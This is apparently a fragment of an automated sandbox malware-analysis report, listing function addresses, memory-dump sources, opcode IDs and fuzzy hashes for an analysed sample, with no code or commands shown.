                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e89cb9ddbc4bb458d95d2382cc17c0d83ec7206ef446bc30a36c9b83ac941f6d
                                                                      • Instruction ID: 2facc6acb631ee4c3c952d353f8c9b6c94a3b2f130bf2833841ded48326ffe6a
                                                                      • Opcode Fuzzy Hash: e89cb9ddbc4bb458d95d2382cc17c0d83ec7206ef446bc30a36c9b83ac941f6d
                                                                      • Instruction Fuzzy Hash: D802AA30B1891A5FE795FB7CC45A67A77D2EF5831171504FAE44ECB2A2EE28EC428740
                                                                      Function 00007FFBC7C5BD1C Relevance: .3, Instructions: 345COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c9aaa9e538336f5e07c33ce215b35fce6e210138f49cd171dd909931d6f546d6
                                                                      • Instruction ID: 02596ba25369522eea1cb6562422fcc98fb53ec7fdc4380ffec00b83b3de660a
                                                                      • Opcode Fuzzy Hash: c9aaa9e538336f5e07c33ce215b35fce6e210138f49cd171dd909931d6f546d6
                                                                      • Instruction Fuzzy Hash: 01B19470508A4E8FEBA8DF28D8457FA37D1FF55310F10423AE84DC7692CA75A945CB82
                                                                      Function 00007FFBC7C58C0C Relevance: .2, Instructions: 192COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8ce4b7871e4dcf4b3a2d5766f2cb43f9b008c204f7e65dc6370664e76cf1adfd
                                                                      • Instruction ID: 5e790924632d83ae929f3e0091a8dd19c1d9722b7fbbeaff44c913bbf2808bc2
                                                                      • Opcode Fuzzy Hash: 8ce4b7871e4dcf4b3a2d5766f2cb43f9b008c204f7e65dc6370664e76cf1adfd
                                                                      • Instruction Fuzzy Hash: 4C516E70908A5D8FDB98DB58D845BE9BBF1FF59310F1082AAD04DD3252CA34A9848B81
                                                                      Function 00007FFBC7C555D8 Relevance: .2, Instructions: 191COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f4361eb28af83bb626339781c4b2251182b0d273c3133893a5abadbecf82c1a2
                                                                      • Instruction ID: bcfb950149a246809cb71de454e08ce6cafd704b5516ca661be3619f2ba76b75
                                                                      • Opcode Fuzzy Hash: f4361eb28af83bb626339781c4b2251182b0d273c3133893a5abadbecf82c1a2
                                                                      • Instruction Fuzzy Hash: 3B51D070B0991E5FDB85FBBCC4492BA77E1EF9921174400BAE00EC76A2ED289C418710
                                                                      Function 00007FFBC7C555E8 Relevance: .2, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 253ae0f7f3f59d83892c627b7209756b8f7985b005f89e55eee6afe499ec7d92
                                                                      • Instruction ID: ec8476d905ff486e85f021f8cda9d2c433229c624466c55c0fcef3dc041801e1
                                                                      • Opcode Fuzzy Hash: 253ae0f7f3f59d83892c627b7209756b8f7985b005f89e55eee6afe499ec7d92
                                                                      • Instruction Fuzzy Hash: D3412670E09A1E5FE785EF78C80A6BF77E1EF45350B9404BDD40DC7692EE28A8428711
                                                                      Function 00007FFBC7C55955 Relevance: .2, Instructions: 154COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2359bd72d9c407b6e35bb359ffe809da3d999587af844f8b5c61b48577f2963f
                                                                      • Instruction ID: 405c5397233321c0f8e742a96f79586e89b30e3b2ecc007e6d990ad27f48b507
                                                                      • Opcode Fuzzy Hash: 2359bd72d9c407b6e35bb359ffe809da3d999587af844f8b5c61b48577f2963f
                                                                      • Instruction Fuzzy Hash: 96514E7154EBCA5FD7439BB4C8250AABFF0EF13210B1904EED085CB5A3D65D184AC762
                                                                      Function 00007FFBC7C57D9B Relevance: .1, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8b0c6173205444e3f62abf2c1c3794db3cb17284585dde8793eef169e8632a78
                                                                      • Instruction ID: f5530e2abe51adfe9d5b9afd8f3a8877cd688ccdb2661ab6a051fc46d366feca
                                                                      • Opcode Fuzzy Hash: 8b0c6173205444e3f62abf2c1c3794db3cb17284585dde8793eef169e8632a78
                                                                      • Instruction Fuzzy Hash: B931C370B18A1B4FEBC9EB7CD4591BE73D2EF892217A000B9D10EC3692DD29AC918741
                                                                      Function 00007FFBC7C55FDB Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2aff32eb77254475958b2ea06de08763544bee3380d57c6c723507d1cfceae59
                                                                      • Instruction ID: 3b8756106f95e6cca35816477beaa532e7cee9d75a0d66e869625141806ee06a
                                                                      • Opcode Fuzzy Hash: 2aff32eb77254475958b2ea06de08763544bee3380d57c6c723507d1cfceae59
                                                                      • Instruction Fuzzy Hash: A831B260A18A174FE395ABB4C4567BB77D2EF86310F6001BCE50EC7AE2CD6D6C429315
                                                                      Function 00007FFBC7C55608 Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad9e72cc8048390103c4c3a45bd0d2cb66040c8c82fc7df0e9c652903ff88032
                                                                      • Instruction ID: e6247e6869f2a53d00d8e840e992f3362fa47f1f92e8ee7d8819d6df3e9abd91
                                                                      • Opcode Fuzzy Hash: ad9e72cc8048390103c4c3a45bd0d2cb66040c8c82fc7df0e9c652903ff88032
                                                                      • Instruction Fuzzy Hash: 661102B0A0E64A1FE799AB78C4161FF7BD0EF46321F2005BEE14AC3191DE1858018345
                                                                      Function 00007FFBC7C57B3E Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 25e11efff4b70d2e1f457d8d8475ae6afb218c623cafe3f6c750db2c4962a129
                                                                      • Instruction ID: dc9b41156671e6e0260204171823bec031101279e7f9569f0b36449b30f9f346
                                                                      • Opcode Fuzzy Hash: 25e11efff4b70d2e1f457d8d8475ae6afb218c623cafe3f6c750db2c4962a129
                                                                      • Instruction Fuzzy Hash: C2F0B46071991B5BE7C0EBB8E8453BB73C1DF55260F500479E80DC7692ED5EA8428341
                                                                      Function 00007FFBC7C55B84 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7034ba2ec2b9c75d923c6410f1d247d7a1be1cacae214f2ef7a8b88716e8f904
                                                                      • Instruction ID: ce55260c83624247e67c977ebc0f75c6d0893a86c45e4164f1c06411d2147606
                                                                      • Opcode Fuzzy Hash: 7034ba2ec2b9c75d923c6410f1d247d7a1be1cacae214f2ef7a8b88716e8f904
                                                                      • Instruction Fuzzy Hash: 1AF0A0A0B09E4E5FD7C4EAACE4992BA37E3EF98221B10043AD00DC7392DD285C824701
                                                                      Function 00007FFBC7C55B38 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 58528b740d72d354cc3dc6bac004645f6f32a7f79e43c1d2e5eb1b0634302379
                                                                      • Instruction ID: 1bece04996c7d5b172e862f99ead086ff23b16f9543b5153e4c7c57cafbcc4c4
                                                                      • Opcode Fuzzy Hash: 58528b740d72d354cc3dc6bac004645f6f32a7f79e43c1d2e5eb1b0634302379
                                                                      • Instruction Fuzzy Hash: 45F020A044A79A2FC3A2AAF9C81E4A73ED1DF832A071104BEB009C7690E8180C068656
                                                                      Function 00007FFBC7C57AC0 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 245c6dab4b5715421b5168339c08ca6923d690aba92edea9fafc497f1de371ab
                                                                      • Instruction ID: c695b6c36f09f9576163605fa75cfd5852e48b9f5be7fafbb3676679435b7c79
                                                                      • Opcode Fuzzy Hash: 245c6dab4b5715421b5168339c08ca6923d690aba92edea9fafc497f1de371ab
                                                                      • Instruction Fuzzy Hash: 25D02BE082720A0FCA8BBEF5C8571523B809F02010BD440A8C44587A62E60E0C865392
                                                                      Function 00007FFBC7C55FA9 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 028a839e68cb0a628fbea3bc4dffac9b30faea2c39ad2866300c843ecc8f13a9
                                                                      • Instruction ID: 3a54f772233be52edf44fa48b9d168268bcd221abdef18a670e4233a4580849d
                                                                      • Opcode Fuzzy Hash: 028a839e68cb0a628fbea3bc4dffac9b30faea2c39ad2866300c843ecc8f13a9
                                                                      • Instruction Fuzzy Hash: 1DD05E2071DA661BE38163F9D817BEEA6E2DF86710F7000B9A40DC36D3CC4C6C41875A